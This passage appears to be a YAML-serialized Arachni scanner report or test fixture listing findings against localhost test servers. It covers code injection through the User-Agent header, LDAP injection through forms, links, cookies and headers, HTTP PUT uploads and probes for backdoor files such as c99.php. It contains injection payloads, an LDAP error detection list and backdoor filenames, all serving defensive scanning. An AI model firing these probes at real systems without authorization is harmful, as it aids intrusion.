  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/ruby/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: ;puts 287630581954+4196403186331128
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;puts 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;puts 287630581954+4196403186331128
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: ;puts 287630581954+4196403186331128
      :injected: ;puts 287630581954+4196403186331128
      :combo: 
        User-Agent: ;puts 287630581954+4196403186331128
      :action: http://localhost:11414/ruby/header/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/ruby/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: header
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/ruby/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;puts 287630581954+4196403186331128
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: arachni_user;puts 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;puts 287630581954+4196403186331128
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;puts 287630581954+4196403186331128
      :injected: arachni_user;puts 287630581954+4196403186331128
      :combo: 
        User-Agent: arachni_user;puts 287630581954+4196403186331128
      :action: http://localhost:11414/ruby/header/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/ruby/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: ""
  cwe: "90"
  cwe_url: http://cwe.mitre.org/data/definitions/90.html
  description: |-
    LDAP queries can be injected into the web application
        which can be used to disclose sensitive data of affect the execution flow.
  elem: form
  internal_modname: LDAPInjection
  method: GET
  mod_name: LDAPInjection
  name: LDAP Injection
  references: 
    WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
    OWASP: http://www.owasp.org/index.php/LDAP_injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used in an LDAP query.
  severity: High
  tags: 
  - ldap
  - injection
  - regexp
  url: http://localhost:6421/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: ""
    cwe: "90"
    cwe_url: http://cwe.mitre.org/data/definitions/90.html
    description: |-
      LDAP queries can be injected into the web application
          which can be used to disclose sensitive data of affect the execution flow.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "723"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid ldap
    injected: default#^($!@$)(()))******
    internal_modname: LDAPInjection
    method: GET
    mod_name: LDAPInjection
    name: LDAP Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: supplied argument is not a valid ldap
      :match: supplied argument is not a valid ldap
      :substring: 
      - supplied argument is not a valid ldap
      - javax.naming.NameNotFoundException
      - LDAPException
      - com.sun.jndi.ldap
      - "Search: Bad search filter"
      - Protocol error occurred
      - Size limit has exceeded
      - An inappropriate matching occurred
      - A constraint violation occurred
      - The syntax is invalid
      - Object does not exist
      - The alias is invalid
      - The distinguished name has an invalid syntax
      - The server does not handle directory requests
      - There was a naming violation
      - There was an object class violation
      - Results returned are too large
      - Unknown error occurred
      - Local error occurred
      - The search filter is incorrect
      - The search filter is invalid
      - The search filter cannot be recognized
      - Invalid DN syntax
      - No Such Object
      - IPWorksASP.LDAP
      - Module Products.LDAPMultiPlugins
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "#^($!@$)(()))******"
      :altered: input
      :element: form
      :params: 
        input: default#^($!@$)(()))******
      :follow_location: true
      :injected: default#^($!@$)(()))******
      :combo: 
        input: default#^($!@$)(()))******
      :action: http://localhost:6421/form/append
      :verification: false
      :id: supplied argument is not a valid ldap
    references: 
      WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
      OWASP: http://www.owasp.org/index.php/LDAP_injection
    regexp: supplied argument is not a valid ldap
    regexp_match: supplied argument is not a valid ldap
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used in an LDAP query.
    response: |
      supplied argument is not a valid ldap
      javax.naming.NameNotFoundException
      LDAPException
      com.sun.jndi.ldap
      Search: Bad search filter
      Protocol error occurred
      Size limit has exceeded
      An inappropriate matching occurred
      A constraint violation occurred
      The syntax is invalid
      Object does not exist
      The alias is invalid
      The distinguished name has an invalid syntax
      The server does not handle directory requests
      There was a naming violation
      There was an object class violation
      Results returned are too large
      Unknown error occurred
      Local error occurred
      The search filter is incorrect
      The search filter is invalid
      The search filter cannot be recognized
      Invalid DN syntax
      No Such Object
      IPWorksASP.LDAP
      Module Products.LDAPMultiPlugins

    severity: High
    tags: 
    - ldap
    - injection
    - regexp
    url: http://localhost:6421/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: ""
  cwe: "90"
  cwe_url: http://cwe.mitre.org/data/definitions/90.html
  description: |-
    LDAP queries can be injected into the web application
        which can be used to disclose sensitive data of affect the execution flow.
  elem: link
  internal_modname: LDAPInjection
  method: GET
  mod_name: LDAPInjection
  name: LDAP Injection
  references: 
    WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
    OWASP: http://www.owasp.org/index.php/LDAP_injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used in an LDAP query.
  severity: High
  tags: 
  - ldap
  - injection
  - regexp
  url: http://localhost:6421/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: ""
    cwe: "90"
    cwe_url: http://cwe.mitre.org/data/definitions/90.html
    description: |-
      LDAP queries can be injected into the web application
          which can be used to disclose sensitive data of affect the execution flow.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "723"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid ldap
    injected: default#^($!@$)(()))******
    internal_modname: LDAPInjection
    method: GET
    mod_name: LDAPInjection
    name: LDAP Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: supplied argument is not a valid ldap
      :match: supplied argument is not a valid ldap
      :substring: 
      - supplied argument is not a valid ldap
      - javax.naming.NameNotFoundException
      - LDAPException
      - com.sun.jndi.ldap
      - "Search: Bad search filter"
      - Protocol error occurred
      - Size limit has exceeded
      - An inappropriate matching occurred
      - A constraint violation occurred
      - The syntax is invalid
      - Object does not exist
      - The alias is invalid
      - The distinguished name has an invalid syntax
      - The server does not handle directory requests
      - There was a naming violation
      - There was an object class violation
      - Results returned are too large
      - Unknown error occurred
      - Local error occurred
      - The search filter is incorrect
      - The search filter is invalid
      - The search filter cannot be recognized
      - Invalid DN syntax
      - No Such Object
      - IPWorksASP.LDAP
      - Module Products.LDAPMultiPlugins
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "#^($!@$)(()))******"
      :altered: input
      :element: link
      :params: 
        input: default#^($!@$)(()))******
      :follow_location: true
      :injected: default#^($!@$)(()))******
      :combo: 
        input: default#^($!@$)(()))******
      :action: http://localhost:6421/link/append?input=default
      :verification: false
      :id: supplied argument is not a valid ldap
    references: 
      WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
      OWASP: http://www.owasp.org/index.php/LDAP_injection
    regexp: supplied argument is not a valid ldap
    regexp_match: supplied argument is not a valid ldap
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used in an LDAP query.
    response: |
      supplied argument is not a valid ldap
      javax.naming.NameNotFoundException
      LDAPException
      com.sun.jndi.ldap
      Search: Bad search filter
      Protocol error occurred
      Size limit has exceeded
      An inappropriate matching occurred
      A constraint violation occurred
      The syntax is invalid
      Object does not exist
      The alias is invalid
      The distinguished name has an invalid syntax
      The server does not handle directory requests
      There was a naming violation
      There was an object class violation
      Results returned are too large
      Unknown error occurred
      Local error occurred
      The search filter is incorrect
      The search filter is invalid
      The search filter cannot be recognized
      Invalid DN syntax
      No Such Object
      IPWorksASP.LDAP
      Module Products.LDAPMultiPlugins

    severity: High
    tags: 
    - ldap
    - injection
    - regexp
    url: http://localhost:6421/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: ""
  cwe: "90"
  cwe_url: http://cwe.mitre.org/data/definitions/90.html
  description: |-
    LDAP queries can be injected into the web application
        which can be used to disclose sensitive data of affect the execution flow.
  elem: cookie
  internal_modname: LDAPInjection
  method: GET
  mod_name: LDAPInjection
  name: LDAP Injection
  references: 
    WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
    OWASP: http://www.owasp.org/index.php/LDAP_injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used in an LDAP query.
  severity: High
  tags: 
  - ldap
  - injection
  - regexp
  url: http://localhost:6421/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: ""
    cwe: "90"
    cwe_url: http://cwe.mitre.org/data/definitions/90.html
    description: |-
      LDAP queries can be injected into the web application
          which can be used to disclose sensitive data of affect the execution flow.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value#^($!@$)(()))******
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "723"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid ldap
    injected: cookie value#^($!@$)(()))******
    internal_modname: LDAPInjection
    method: GET
    mod_name: LDAPInjection
    name: LDAP Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: supplied argument is not a valid ldap
      :match: supplied argument is not a valid ldap
      :substring: 
      - supplied argument is not a valid ldap
      - javax.naming.NameNotFoundException
      - LDAPException
      - com.sun.jndi.ldap
      - "Search: Bad search filter"
      - Protocol error occurred
      - Size limit has exceeded
      - An inappropriate matching occurred
      - A constraint violation occurred
      - The syntax is invalid
      - Object does not exist
      - The alias is invalid
      - The distinguished name has an invalid syntax
      - The server does not handle directory requests
      - There was a naming violation
      - There was an object class violation
      - Results returned are too large
      - Unknown error occurred
      - Local error occurred
      - The search filter is incorrect
      - The search filter is invalid
      - The search filter cannot be recognized
      - Invalid DN syntax
      - No Such Object
      - IPWorksASP.LDAP
      - Module Products.LDAPMultiPlugins
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "#^($!@$)(()))******"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value#^($!@$)(()))******
      :injected: cookie value#^($!@$)(()))******
      :combo: 
        cookie2: cookie value#^($!@$)(()))******
      :action: http://localhost:6421/cookie/append
      :verification: false
      :id: supplied argument is not a valid ldap
    references: 
      WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
      OWASP: http://www.owasp.org/index.php/LDAP_injection
    regexp: supplied argument is not a valid ldap
    regexp_match: supplied argument is not a valid ldap
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used in an LDAP query.
    response: |
      supplied argument is not a valid ldap
      javax.naming.NameNotFoundException
      LDAPException
      com.sun.jndi.ldap
      Search: Bad search filter
      Protocol error occurred
      Size limit has exceeded
      An inappropriate matching occurred
      A constraint violation occurred
      The syntax is invalid
      Object does not exist
      The alias is invalid
      The distinguished name has an invalid syntax
      The server does not handle directory requests
      There was a naming violation
      There was an object class violation
      Results returned are too large
      Unknown error occurred
      Local error occurred
      The search filter is incorrect
      The search filter is invalid
      The search filter cannot be recognized
      Invalid DN syntax
      No Such Object
      IPWorksASP.LDAP
      Module Products.LDAPMultiPlugins

    severity: High
    tags: 
    - ldap
    - injection
    - regexp
    url: http://localhost:6421/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: ""
  cwe: "90"
  cwe_url: http://cwe.mitre.org/data/definitions/90.html
  description: |-
    LDAP queries can be injected into the web application
        which can be used to disclose sensitive data of affect the execution flow.
  elem: header
  internal_modname: LDAPInjection
  method: GET
  mod_name: LDAPInjection
  name: LDAP Injection
  references: 
    WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
    OWASP: http://www.owasp.org/index.php/LDAP_injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used in an LDAP query.
  severity: High
  tags: 
  - ldap
  - injection
  - regexp
  url: http://localhost:6421/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: ""
    cwe: "90"
    cwe_url: http://cwe.mitre.org/data/definitions/90.html
    description: |-
      LDAP queries can be injected into the web application
          which can be used to disclose sensitive data of affect the execution flow.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user#^($!@$)(()))******
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "723"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid ldap
    injected: arachni_user#^($!@$)(()))******
    internal_modname: LDAPInjection
    method: GET
    mod_name: LDAPInjection
    name: LDAP Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: supplied argument is not a valid ldap
      :match: supplied argument is not a valid ldap
      :substring: 
      - supplied argument is not a valid ldap
      - javax.naming.NameNotFoundException
      - LDAPException
      - com.sun.jndi.ldap
      - "Search: Bad search filter"
      - Protocol error occurred
      - Size limit has exceeded
      - An inappropriate matching occurred
      - A constraint violation occurred
      - The syntax is invalid
      - Object does not exist
      - The alias is invalid
      - The distinguished name has an invalid syntax
      - The server does not handle directory requests
      - There was a naming violation
      - There was an object class violation
      - Results returned are too large
      - Unknown error occurred
      - Local error occurred
      - The search filter is incorrect
      - The search filter is invalid
      - The search filter cannot be recognized
      - Invalid DN syntax
      - No Such Object
      - IPWorksASP.LDAP
      - Module Products.LDAPMultiPlugins
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "#^($!@$)(()))******"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user#^($!@$)(()))******
      :injected: arachni_user#^($!@$)(()))******
      :combo: 
        User-Agent: arachni_user#^($!@$)(()))******
      :action: http://localhost:6421/header/append
      :verification: false
      :id: supplied argument is not a valid ldap
    references: 
      WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
      OWASP: http://www.owasp.org/index.php/LDAP_injection
    regexp: supplied argument is not a valid ldap
    regexp_match: supplied argument is not a valid ldap
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used in an LDAP query.
    response: |
      supplied argument is not a valid ldap
      javax.naming.NameNotFoundException
      LDAPException
      com.sun.jndi.ldap
      Search: Bad search filter
      Protocol error occurred
      Size limit has exceeded
      An inappropriate matching occurred
      A constraint violation occurred
      The syntax is invalid
      Object does not exist
      The alias is invalid
      The distinguished name has an invalid syntax
      The server does not handle directory requests
      There was a naming violation
      There was an object class violation
      Results returned are too large
      Unknown error occurred
      Local error occurred
      The search filter is incorrect
      The search filter is invalid
      The search filter cannot be recognized
      Invalid DN syntax
      No Such Object
      IPWorksASP.LDAP
      Module Products.LDAPMultiPlugins

    severity: High
    tags: 
    - ldap
    - injection
    - regexp
    url: http://localhost:6421/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "650"
  cwe_url: http://cwe.mitre.org/data/definitions/650.html
  description: 3rd parties can upload files to the web-server.
  elem: server
  internal_modname: HTTP_PUT
  method: GET
  mod_name: HTTP PUT
  name: HTTP PUT is enabled.
  references: 
    W3: http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
  remedy_guidance: Disable the PUT method on the Web Server and/or disable write permissions to the web server directory.
  severity: High
  tags: 
  - http
  - methods
  - put
  - server
  url: http://localhost:14592/Arachni-71da6
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "650"
    cwe_url: http://cwe.mitre.org/data/definitions/650.html
    description: 3rd parties can upload files to the web-server.
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: HTTP_PUT
    method: GET
    mod_name: HTTP PUT
    name: HTTP PUT is enabled.
    opts: 
      :element: server
      :regexp: ""
    references: 
      W3: http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
    regexp: ""
    regexp_match: 
    remedy_guidance: Disable the PUT method on the Web Server and/or disable write permissions to the web server directory.
    response: Created by Arachni. PUT71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    severity: High
    tags: 
    - http
    - methods
    - put
    - server
    url: http://localhost:14592/Arachni-71da6
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/r57shell.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "12"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: r57shell.php
    injected: r57shell.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: r57shell.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/r57shell.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/r57.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: r57.php
    injected: r57.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: r57.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/r57.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/c99.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: c99.php
    injected: c99.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: c99.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/c99.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/c99shell.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "12"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: c99shell.php
    injected: c99shell.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: c99shell.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/c99shell.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
